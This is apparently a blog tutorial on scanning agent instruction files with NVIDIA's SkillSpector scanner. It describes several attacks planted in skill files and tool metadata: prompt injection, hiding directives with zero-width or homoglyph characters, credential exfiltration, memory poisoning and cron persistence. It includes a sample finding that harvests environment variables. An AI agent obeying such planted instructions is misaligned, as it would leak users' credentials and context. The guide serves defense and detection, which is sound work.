AI Agent Skill Security: How to Scan CLAUDE.md, AGENTS.md, and Skill Files Before They Run
Per NVIDIA research cited in the SkillSpector README, 26.1% of AI agent skills contain security vulnerabilities and 5.2% show likely malicious intent. That is the finding to act on. A skill file is the CLAUDE.md, AGENTS.md, or SKILL.md that tools like Claude Code, Codex CLI, and Gemini CLI load automatically when they start. Roughly one in four of them carries a defect a scanner can catch before it runs. SkillSpector, NVIDIA's open-source scanner for exactly this surface, has passed 7,000 GitHub stars (7.6k, per the repo page) and trended #3 on GitHub's Python list this week. That is a sign the gap is now being taken seriously in practice, not only in the abstract.
This guide is for the developer or ops lead who installs third-party skill files, or who runs an agent in CI. We walk through what the threat actually is, how to scan a file in one command, how to read the score, and the one flag to set first.
What an agent skill is, and why it runs with no vetting step
An agent skill is plain instruction text plus, often, helper scripts. When Claude Code or Codex CLI opens a project, it reads the skill files in scope and folds them into the agent's context, and any scripts they reference run with your shell's privileges, per the SkillSpector README. There is no package registry, no signature check, no review queue. You clone a repo or paste a skill from a gist, the agent picks it up, and it executes with implicit OS trust the moment the session starts.
That is a different attack surface from the one we covered in TrustFall, which abused the MCP trust dialog to auto-run a server defined in .mcp.json. Same threat category, different door. TrustFall weaponized the config that loads tools. Skill files weaponize the instructions that steer the agent and the scripts they carry. If you are mapping the broader picture, our MCP stateless migration guide covers how the protocol layer underneath all of this has been shifting. The skill layer is the part with no gatekeeper at all, which is what makes the 26.1% number land.
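Nothing vets these files, so a sensible first step is knowing which ones an agent in your repo could pick up. The Python sketch below walks a project tree and lists every CLAUDE.md, AGENTS.md, or SKILL.md it finds.

Treat it as an illustration under stated assumptions. It matches exact filenames inside the project only. Real agents also read user-level files, and each tool applies its own lookup rules. `find_skill_files` and the skipped-directory list are our own and are not part of any tool.

```python
import os
from pathlib import Path

# Filenames the article names as auto-loaded skill/instruction files.
# Assumption: exact-name match inside the project tree only; real tools
# also read user-level files and apply their own lookup rules.
SKILL_FILENAMES = {"CLAUDE.md", "AGENTS.md", "SKILL.md"}

# Directories we do not descend into (hypothetical, adjust per repo).
SKIP_DIRS = {".git", "node_modules", ".venv"}


def find_skill_files(root: str) -> list[Path]:
    """Return every skill/instruction file under root, sorted by path."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune in place so os.walk never enters the skipped directories.
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            if name in SKILL_FILENAMES:
                found.append(Path(dirpath) / name)
    return sorted(found)


if __name__ == "__main__":
    # List what an agent opened in the current directory could pick up.
    for skill_file in find_skill_files("."):
        print(skill_file)
```

Run it at the repo root before opening an agent session, and you have the list of files worth scanning.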
What SkillSpector scans for
SkillSpector ships 64 vulnerability patterns across 16 categories, per the README. The full list is below. Three categories carry most of the real-world risk, so read those rows first.
| Category | Patterns | What it catches |
|---|---|---|
| Prompt injection | 5 | Instructions that override safety constraints, hidden directives in comments or invisible text, commands to exfiltrate context |
| Data exfiltration | 4 | Env-variable harvesting (API keys), file-system enumeration, transmitting context to external URLs |
| MCP tool poisoning | 4 | Hidden directives in tool metadata (HTML comments, zero-width chars, base64), homoglyph and right-to-left deception, description-vs-behavior mismatch |
| Privilege escalation | 3 | Sudo/root execution, reading SSH keys and tokens |
| Supply chain | 6 | curl \| bash remote execution, obfuscated payloads, dependencies with known CVEs via a live OSV.dev lookup, typosquatting |
| Excessive agency | 4 | Unrestricted tool access, autonomous high-impact decisions with no human in the loop |
| Output handling | 3 | Model output used without sanitization across a trust boundary |
| System prompt leakage | 3 | Direct and indirect extraction of system prompts or internal rules |
| Memory poisoning | 3 | Content built to persist across sessions, context-window stuffing that displaces safety constraints |
| Tool misuse | 3 | Parameter abuse (shell=True, --force), chains that bypass per-tool checks |
| Rogue agent | 2 | Runtime self-modification, persistence via cron jobs or startup scripts |
| Trigger abuse | 3 | Triggers that shadow built-in commands, generic keyword baiting |
| Dangerous code (AST) | 8 | exec(), eval(), dynamic imports, subprocess, os.system, and chained execution |
| Taint tracking | 5 | Credential-to-network flows, file-read-to-exfiltration, external-input-to-code-execution |
| YARA signatures | 4 | Known malware, webshell, cryptominer, and exploit-tool matches |
| MCP least privilege | 4 | Capabilities used but not declared, wildcard permissions, missing permission fields |
Source: SkillSpector README.
The dangerous three are at the top for a reason. Prompt injection is the one most people picture: a line buried in a skill that tells the agent to ignore its guardrails or quietly forward your context elsewhere. Data exfiltration is where a skill harvests os.environ and posts it to an external host, which is how a credential leak becomes a credential theft. MCP tool poisoning is the subtle one. It hides directives inside tool metadata using zero-width characters or homoglyphs, so the description a human reads and the instruction the model parses are not the same string. Static patterns plus optional LLM evaluation are how SkillSpector reaches those last two, since a homoglyph attack is invisible to a quick eyeball pass.
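A few lines of Python show why a character-level check catches what a human reviewer misses. The sketch below flags two kinds of hidden content:

- zero-width and bidirectional-control characters;
- words that mix ASCII letters with Cyrillic or Greek look-alikes, a crude homoglyph heuristic.

It is not SkillSpector's rule set. The character lists, the script list, and `find_hidden_chars` are assumptions made for illustration.

```python
import re
import unicodedata

# Invisible characters commonly used to hide text (assumed, not exhaustive).
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}
# Bidirectional embeddings/overrides (U+202A-U+202E) and isolates (U+2066-U+2069).
BIDI_CONTROLS = {chr(c) for c in range(0x202A, 0x202F)} | {
    chr(c) for c in range(0x2066, 0x206A)
}
# Scripts whose letters often impersonate Latin ones (assumed, not exhaustive).
LOOKALIKE_SCRIPTS = ("CYRILLIC", "GREEK")


def find_hidden_chars(text: str) -> list[tuple[int, str]]:
    """Return (line number, reason) pairs for suspicious characters or words."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for ch in line:
            if ch in ZERO_WIDTH:
                findings.append((lineno, f"zero-width U+{ord(ch):04X}"))
            elif ch in BIDI_CONTROLS:
                findings.append((lineno, f"bidi control U+{ord(ch):04X}"))
        # Crude homoglyph heuristic: one word mixing ASCII letters with letters
        # from a look-alike script, e.g. Latin "p" next to Cyrillic U+0430.
        for word in re.findall(r"\w+", line):
            has_ascii = any(c.isascii() and c.isalpha() for c in word)
            has_lookalike = any(
                unicodedata.name(c, "").startswith(LOOKALIKE_SCRIPTS) for c in word
            )
            if has_ascii and has_lookalike:
                findings.append((lineno, f"mixed-script word {word!r}"))
    return findings
```

A word written entirely in Cyrillic or Greek is not flagged, which keeps legitimate non-English text quiet. The trade-off is that a look-alike word spelled wholly in another script slips through.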
How to run a scan
SkillSpector needs Python 3.12+, per the README. Clone it, drop into a virtualenv, and run make install.
```bash
# Install from source (requires Python 3.12+)
git clone https://github.com/NVIDIA/skillspector.git
cd skillspector
# Create and activate a virtual environment
python3 -m venv .venv && source .venv/bin/activate
# Install for production use
make install
```
If you would rather not put Python on the box, build the image and run it in a container. SkillSpector ships a Dockerfile based on the official python:3.12-slim-bookworm image, per the README.
```bash
# Build the image, mount the current directory at /scan, and scan the my-skill/ directory inside it
make docker-build
docker run --rm -v "$PWD:/scan" skillspector scan /scan/my-skill/ --no-llm
```
Once installed, the scan target can be a directory, a single file, a Git URL, or a zip. The same scan verb covers all four input shapes.
```bash
# Scan a local skill directory
skillspector scan ./my-skill/
# Scan a single SKILL.md (or CLAUDE.md / AGENTS.md) file
skillspector scan ./SKILL.md
# Scan a Git repository directly
skillspector scan https://github.com/user/my-skill
# Scan a zipped skill archive
skillspector scan ./my-skill.zip
```
A scan, start to finish
Here is the shape of a run against a skill that harvests environment variables and ships them out. The input is a directory with a SKILL.md and a helper script. The command is a single static-only scan. The output is a risk score, a severity band, and the specific findings with line numbers.
Input: ./suspicious-skill/ containing SKILL.md and scripts/sync.py.
Command:
```bash
skillspector scan ./suspicious-skill/ --no-llm
```
Expected output (abbreviated):
```text
SkillSpector Security Report v2.0.0
Skill: suspicious-skill
Source: ./suspicious-skill/
Risk Assessment
Metric Value
Score 78/100
Severity HIGH
Recommendation DO NOT INSTALL
Issues (2)
HIGH: Env Variable Harvesting (E2)
Location: scripts/sync.py:23
Finding: for key, val in os.environ.items():...
Confidence: 94%
HIGH: External Transmission (E1)
Location: scripts/sync.py:45
Finding: requests.post("https://api.skill.io/env"...
Confidence: 89%
# ... (component table and full explanations omitted)
```
The output above mirrors the example in the SkillSpector README. There are two HIGH findings: one harvests os.environ, and the other posts it to an external host. Together they come out at a 78/100 HIGH score with a flat "DO NOT INSTALL" recommendation. That is the pattern the scanner is built to surface: not one smoking gun, but a chain.
Reading the results
The headline is a single number from 0 to 100, and each finding adds to it by severity, per the README: a CRITICAL issue is +50, a HIGH is +25, a MEDIUM is +10, a LOW is +5, and anything in an executable script gets a 1.3x multiplier on top. The total maps to four bands with a plain-language recommendation.
| Score | Severity | Recommendation |
|---|---|---|
| 0-20 | LOW | SAFE |
| 21-50 | MEDIUM | CAUTION |
| 51-80 | HIGH | DO NOT INSTALL |
| 81-100 | CRITICAL | DO NOT INSTALL |
Source: SkillSpector README.
The bands are deliberately blunt. Anything above 50 is a "do not install," full stop.

Note where the boundary sits. A single CRITICAL finding scores exactly 50 on its own, which is the top of the MEDIUM band, not a "do not install." The same finding in an executable script picks up the 1.3x multiplier and lands at 65, squarely in HIGH.

Treat MEDIUM as "read every finding by hand before you trust it," not as a passing grade.
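The quoted scoring rules are simple enough to sketch in Python. The functions below apply the README's per-finding weights, the 1.3x executable-script multiplier, and the four bands.

Three details are our assumptions: the multiplier applies to each script finding individually, the total is rounded to an integer, and it is capped at 100. `risk_score` and `band` are hypothetical names, not SkillSpector's API.

```python
# Per-finding weights, multiplier, and bands as this article quotes them from the README.
WEIGHTS = {"CRITICAL": 50, "HIGH": 25, "MEDIUM": 10, "LOW": 5}
SCRIPT_MULTIPLIER = 1.3
BANDS = [
    (20, "LOW", "SAFE"),
    (50, "MEDIUM", "CAUTION"),
    (80, "HIGH", "DO NOT INSTALL"),
    (100, "CRITICAL", "DO NOT INSTALL"),
]


def risk_score(findings: list[tuple[str, bool]]) -> int:
    """findings: (severity, in_executable_script) pairs. Returns 0-100."""
    total = 0.0
    for severity, in_script in findings:
        weight = WEIGHTS[severity]
        # Assumption: the multiplier applies to each script finding individually.
        total += weight * SCRIPT_MULTIPLIER if in_script else weight
    # Assumptions: round to an integer and cap the total at 100.
    return min(100, round(total))


def band(score: int) -> tuple[str, str]:
    """Map a score to (severity, recommendation) using the quoted bands."""
    for upper, severity, recommendation in BANDS:
        if score <= upper:
            return severity, recommendation
    raise ValueError(f"score out of range: {score}")
```

Feed it the two HIGH findings from the report above, both in scripts/sync.py, and these weights give 2 × 25 × 1.3 = 65. That is the same HIGH band, but below the 78 the README's example shows. The real scorer evidently weighs more than the per-finding numbers quoted here; the component table omitted from the abbreviated output is the likely place to look.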
For automation, the format that matters is SARIF. SkillSpector emits Terminal, JSON, Markdown, and SARIF, per the README, and SARIF is the one CI systems and IDEs speak. Write it to a file and a GitHub code-scanning workflow can ingest it like any other static-analysis result.
```bash
# Emit SARIF for CI / GitHub code scanning
skillspector scan ./my-skill/ --no-llm --format sarif --output report.sarif
```
That turns "is this skill safe" from a one-off question into a gate that runs on every change.
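If you want the CI job itself to fail, not just annotate a pull request, a short Python script can read report.sarif and return a nonzero exit code. It relies only on the standard SARIF 2.1.0 layout (runs, results, level, ruleId, locations).

Which SARIF level SkillSpector assigns to a HIGH or CRITICAL finding is an assumption here, so inspect a real report before trusting the default `error` threshold. `failing_results` and the script name are hypothetical.

```python
import json
import sys

# SARIF result levels, lowest to highest.
LEVEL_RANK = {"none": 0, "note": 1, "warning": 2, "error": 3}


def failing_results(sarif: dict, threshold: str = "error") -> list[str]:
    """Return 'ruleId at uri:line' for each result at or above threshold."""
    failures = []
    for run in sarif.get("runs", []):
        for result in run.get("results", []):
            # Simplification: a missing level is treated as "warning", the SARIF
            # default; rule-level defaults in the report are ignored here.
            level = result.get("level", "warning")
            if LEVEL_RANK.get(level, 0) < LEVEL_RANK[threshold]:
                continue
            locations = result.get("locations") or [{}]
            physical = locations[0].get("physicalLocation", {})
            uri = physical.get("artifactLocation", {}).get("uri", "?")
            line = physical.get("region", {}).get("startLine", "?")
            failures.append(f"{result.get('ruleId', '?')} at {uri}:{line}")
    return failures


def main(path: str) -> int:
    """Print blocking results from a SARIF file; return a CI exit code."""
    with open(path, encoding="utf-8") as fh:
        problems = failing_results(json.load(fh))
    for problem in problems:
        print(problem)
    return 1 if problems else 0


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage (hypothetical script name): python sarif_gate.py report.sarif
    sys.exit(main(sys.argv[1]))
```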
SkillSpector vs GitHub Copilot's validation: what each covers
A reasonable question: doesn't GitHub already do this? On June 9, 2026, GitHub made security validation for third-party coding agents generally available, per the GitHub changelog. That release extends the checks already running for Copilot's own cloud agent to agents like Claude and OpenAI Codex.

When one of those agents opens a pull request, GitHub runs three checks on the code it wrote: CodeQL analysis, a dependency screen against the GitHub Advisory Database, and secret scanning. If it finds something, the agent tries to fix it before finalizing the PR.
That is real coverage, and it is the wrong layer for this problem. Copilot's validation looks at the code the agent generates. SkillSpector looks at the instruction files that configure the agent in the first place. A poisoned CLAUDE.md never shows up as a vulnerability in a generated diff, because the malicious part is the steering text, not the output. It can sit in your repo, shape every agent run, and pass CodeQL clean because there is no vulnerable code for CodeQL to find.
| Layer | GitHub Copilot validation | SkillSpector |
|---|---|---|
| Agent-generated code in a PR | Covered (CodeQL, Advisory DB, secret scan) | Not the target |
| Skill / instruction files (CLAUDE.md, AGENTS.md, SKILL.md) | Not scanned | Covered (64 patterns) |
| MCP tool metadata poisoning | Not scanned | Covered |
| A subtle prompt injection that passes static checks | Gap | Reduced by LLM stage, not eliminated |
Sources: GitHub changelog and SkillSpector README.
Neither fully closes the hardest case. A prompt injection written in clean prose with no executable tell can slip past static patterns, and SkillSpector's optional LLM evaluation reduces that risk without erasing it. The honest framing is layered defense: Copilot guards the output, SkillSpector guards the input, and a careful human still reads anything that scores MEDIUM or above.
The verdict: run it, and set one flag first
If your team installs third-party skill files, pulls agent configs from public repos, or runs any agent in CI, run SkillSpector. The decision is not close, for three reasons:

- We know of no other open-source scanner aimed squarely at the skill-file surface.
- The install is a clone and a make install.
- The 26.1% base rate, per the README, means a scan pays for itself the first time it flags a real problem.

The cost of skipping it is a poisoned instruction file steering an agent that already runs with your privileges.
Set --no-llm first. The static-only path needs no API key, runs fast enough to drop into a pre-commit hook or a CI job, and catches the executable and supply-chain patterns that do the most damage, per the README. Add the LLM stage later for the subtle prompt-injection and tool-poisoning cases once the fast gate is in place. The order matters: a fast static gate you actually run beats a thorough scan you skip because it is slow.
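For the pre-commit case, the Python sketch below picks skill files out of the paths staged for commit. It then runs `skillspector scan <dir> --no-llm` on each directory that contains one.

Two assumptions need checking before you rely on it. First, it assumes `skillspector scan` exits nonzero when it finds a blocking issue; if it does not, gate on the SARIF output instead. Second, it assumes matching by filename is enough for your repo. `changed_skill_targets`, `scan_commands`, and `main` are hypothetical helpers.

```python
import subprocess
from pathlib import PurePosixPath

# Filenames treated as skill/instruction files (assumption: match by name).
SKILL_FILENAMES = {"CLAUDE.md", "AGENTS.md", "SKILL.md"}


def changed_skill_targets(changed_paths: list[str]) -> list[str]:
    """Directories containing changed skill files, deduplicated and sorted.

    Scanning the directory rather than the file pulls in helper scripts
    that sit next to a SKILL.md, such as scripts/sync.py.
    """
    return sorted({
        str(PurePosixPath(p).parent)
        for p in changed_paths
        if PurePosixPath(p).name in SKILL_FILENAMES
    })


def scan_commands(targets: list[str]) -> list[list[str]]:
    """One static-only SkillSpector scan per target, using flags from the article."""
    return [["skillspector", "scan", target, "--no-llm"] for target in targets]


def main() -> int:
    """Scan skill files staged for commit; return nonzero to block the commit."""
    staged = subprocess.run(
        ["git", "diff", "--cached", "--name-only"],
        capture_output=True, text=True, check=True,
    ).stdout.splitlines()
    exit_code = 0
    for cmd in scan_commands(changed_skill_targets(staged)):
        # Assumption: skillspector exits nonzero when it finds a blocking issue.
        if subprocess.run(cmd).returncode != 0:
            exit_code = 1
    return exit_code
```

A hook file built from this would end with `raise SystemExit(main())`. It only triggers on changes to the instruction files themselves, so an edit to a helper script alone is not scanned.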
For a CI scan pipeline, the container path is the clean way to ship it. Build the image once, run it against every skill file on push, and emit SARIF into your code-scanning workflow with no Python on the runner at all. A managed VPS such as Cloudways gives you a persistent box to host that container and your scan pipeline without standing up infrastructure by hand. Point it at your repos, gate on a HIGH score, and the question "is this skill safe to install" stops being something you answer by reading and starts being something your pipeline answers for you.